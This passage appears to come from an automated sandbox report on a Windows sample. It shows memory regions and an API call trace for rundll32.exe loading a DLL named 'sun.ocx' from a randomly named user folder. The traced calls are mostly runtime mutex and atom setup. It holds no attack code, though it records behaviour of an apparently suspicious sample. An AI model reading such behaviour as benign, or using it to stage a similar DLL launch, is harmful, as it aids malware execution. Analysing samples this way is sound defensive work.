end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 970 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 971 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 972 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 973 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 974 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 975 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 976 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 977 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 978 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 979 start_va = 0xb0000 end_va = 0xb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 980 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 981 start_va = 0x340000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 982 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 983 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 984 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 985 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 986 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 987 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 988 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 989 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 990 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 991 start_va = 0x3c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 992 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 993 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 994 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 995 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 996 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 997 start_va = 0x110000 end_va = 0x176fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 998 start_va = 0x72950000 end_va = 0x72b04fff monitored = 0 entry_point = 0x72a43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 999 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1000 start_va = 0x72c50000 end_va = 0x72cb4fff monitored = 0 entry_point = 0x72c6fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 1001 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1002 start_va = 0x72b80000 end_va = 0x72c4afff monitored = 0 entry_point = 0x72b96a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 1003 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1004 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1005 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1006 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1007 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1008 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1009 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1010 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1011 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1012 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1013 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1014 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1015 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1016 start_va = 0x72b60000 end_va = 0x72b76fff monitored = 0 entry_point = 0x72b61c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1017 start_va = 0x743a0000 end_va = 0x743aafff monitored = 0 entry_point = 0x743a1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1018 start_va = 0x775b0000 end_va = 0x775d9fff monitored = 0 entry_point = 0x775b12fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1019 start_va = 0x5c0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1020 start_va = 0xc0000 end_va = 0xddfff monitored = 0 entry_point = 0xd158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1021 start_va = 0x6e0000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1022 start_va = 0xc0000 end_va = 0xddfff monitored = 0 entry_point = 0xd158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1023 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1024 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1025 start_va = 0xc0000 end_va = 0xc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1026 start_va = 0x870000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1027 start_va = 0xa00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1028 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1029 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1030 start_va = 0x73340000 end_va = 0x73342fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1031 start_va = 0x1e00000 end_va = 0x20cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1032 start_va = 0x180000 end_va = 0x180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1033 start_va = 0x190000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1034 start_va = 0x180000 end_va = 0x180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1035 start_va = 0x190000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1036 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1037 start_va = 0x190000 end_va = 0x19dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1038 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 1039 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1040 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1041 start_va = 0x240000 end_va = 0x2a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1042 start_va = 0x240000 end_va = 0x2a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1043 start_va = 0x240000 end_va = 0x2a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1044 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1045 start_va = 0x6ab00000 end_va = 0x6ab5ffff monitored = 1 entry_point = 0x6ab01470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1046 start_va = 0x20d0000 end_va = 0x802efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1047 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1048 start_va = 0x240000 end_va = 0x263fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1049 start_va = 0x3c0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1050 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1051 start_va = 0x10000000 end_va = 0x10026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 1067 start_va = 0x270000 end_va = 0x27afff monitored = 0 entry_point = 0x27178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Thread: id = 41 os_tid = 0xd8c [0088.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x9f3f4 | out: lpSystemTimeAsFileTime=0x9f3f4*(dwLowDateTime=0x74b654e0, dwHighDateTime=0x1d806e7)) [0088.881] GetCurrentProcessId () returned 0xd88 [0088.881] GetCurrentThreadId () returned 0xd8c [0088.881] GetTickCount () returned 0x1b313b7 [0088.881] QueryPerformanceCounter (in: lpPerformanceCount=0x9f3fc | out: lpPerformanceCount=0x9f3fc*=2865243107130) returned 1 [0088.881] malloc (_Size=0x80) returned 0x6d26c8 [0088.882] __dllonexit () returned 0x6ab0c6c0 [0088.882] malloc (_Size=0x5f5e100) returned 0x20d0020 [0091.372] strlen (_Str="use_fc_key") returned 0xa [0091.372] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x138 [0091.373] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.373] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.373] malloc (_Size=0x4) returned 0x6d1448 [0091.373] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAAaAAaAaaaAaAaaaAaaAaa") returned 0xc000 [0091.390] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x9f210, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAAaAAaAaaaAaAaaaAaaAaa") returned 0x3a [0091.390] ReleaseMutex (hMutex=0x138) returned 1 [0091.390] CloseHandle (hObject=0x138) returned 1 [0091.390] strlen (_Str="sjlj_once") returned 0x9 [0091.390] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x138 [0091.391] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.391] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.391] malloc (_Size=0x4) returned 0x6d1458 [0091.391] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAAaAAaAaaaAaAaaaAaAAaa") returned 0xc001 [0091.391] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x9f1f0, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAAaAAaAaaaAaAaaaAaAAaa") returned 0x39 [0091.391] ReleaseMutex (hMutex=0x138) returned 1 [0091.391] CloseHandle (hObject=0x138) returned 1 [0091.391] strlen (_Str="once_global_shmem") returned 0x11 [0091.391] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x138 [0091.392] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.392] FindAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.392] malloc (_Size=0x10) returned 0x6db5e0 [0091.392] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAAaAAaAAaAAaAaAAAAaaaa") returned 0xc002 [0091.392] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x9f180, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAAaAAaAAaAAaAaAAAAaaa") returned 0x40 [0091.392] ReleaseMutex (hMutex=0x138) returned 1 [0091.392] CloseHandle (hObject=0x138) returned 1 [0091.392] strlen (_Str="once_obj_shmem") returned 0xe [0091.392] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x138 [0091.392] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.393] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.393] malloc (_Size=0x4) returned 0x6d1468 [0091.393] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAAaAAaAaaaAaAaaaAAaAaa") returned 0xc003 [0091.393] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x9f190, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAAaAAaAaaaAaAaaaAAaAa") returned 0x3d [0091.393] ReleaseMutex (hMutex=0x138) returned 1 [0091.393] CloseHandle (hObject=0x138) returned 1 [0091.393] calloc (_Count=0x1, _Size=0x10) returned 0x6db5f8 [0091.393] strlen (_Str="mutex_global_shmem") returned 0x12 [0091.393] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x138 [0091.393] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.393] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.393] malloc (_Size=0x10) returned 0x6db610 [0091.393] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaaaAaaa") returned 0xc004 [0091.393] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x9f130, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaaaAaa") returned 0x41 [0091.394] ReleaseMutex (hMutex=0x138) returned 1 [0091.394] CloseHandle (hObject=0x138) returned 1 [0091.394] calloc (_Count=0x1, _Size=0x1c) returned 0x6db628 [0091.394] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x138 [0091.394] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.394] GetCurrentThreadId () returned 0xd8c [0091.394] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0091.394] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x134 [0091.394] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0091.394] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.394] malloc (_Size=0x4) returned 0x6db650 [0091.394] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaAaAaaa") returned 0xc005 [0091.394] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x9f150, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaAaAaa") returned 0x46 [0091.394] ReleaseMutex (hMutex=0x134) returned 1 [0091.395] CloseHandle (hObject=0x134) returned 1 [0091.395] calloc (_Count=0x1, _Size=0x10) returned 0x6db660 [0091.395] calloc (_Count=0x1, _Size=0x1c) returned 0x6db678 [0091.395] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0091.395] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0091.395] GetCurrentThreadId () returned 0xd8c [0091.395] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0091.395] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x13c [0091.395] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0091.395] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.395] malloc (_Size=0x4) returned 0x6db6a0 [0091.395] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaAaAaaaa") returned 0xc006 [0091.395] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x9f110, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaAaAaaa") returned 0x41 [0091.395] ReleaseMutex (hMutex=0x13c) returned 1 [0091.395] CloseHandle (hObject=0x13c) returned 1 [0091.396] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0091.396] CloseHandle (hObject=0x134) returned 1 [0091.396] free (_Block=0x6db678) [0091.396] free (_Block=0x6db660) [0091.396] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0091.396] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x134 [0091.396] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0091.396] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.396] malloc (_Size=0x4) returned 0x6db660 [0091.396] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaAAaaaa") returned 0xc007 [0091.396] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x9f130, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaAAaaa") returned 0x44 [0091.396] ReleaseMutex (hMutex=0x134) returned 1 [0091.396] CloseHandle (hObject=0x134) returned 1 [0091.396] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0091.396] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x134 [0091.397] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0091.397] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.397] malloc (_Size=0x10) returned 0x6db670 [0091.397] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaAAAaaa") returned 0xc008 [0091.397] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x9f0c0, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaaAAAaa") returned 0x48 [0091.397] ReleaseMutex (hMutex=0x134) returned 1 [0091.397] CloseHandle (hObject=0x134) returned 1 [0091.397] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0091.397] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x134 [0091.397] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0091.397] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.397] malloc (_Size=0x4) returned 0x6db688 [0091.397] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaAaaaAaa") returned 0xc009 [0091.397] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x9f0c0, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaAaaaAa") returned 0x45 [0091.397] ReleaseMutex (hMutex=0x134) returned 1 [0091.397] CloseHandle (hObject=0x134) returned 1 [0091.398] calloc (_Count=0x1, _Size=0x1c) returned 0x6db6b0 [0091.398] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0091.398] WaitForSingleObject (hHandle=0x134, 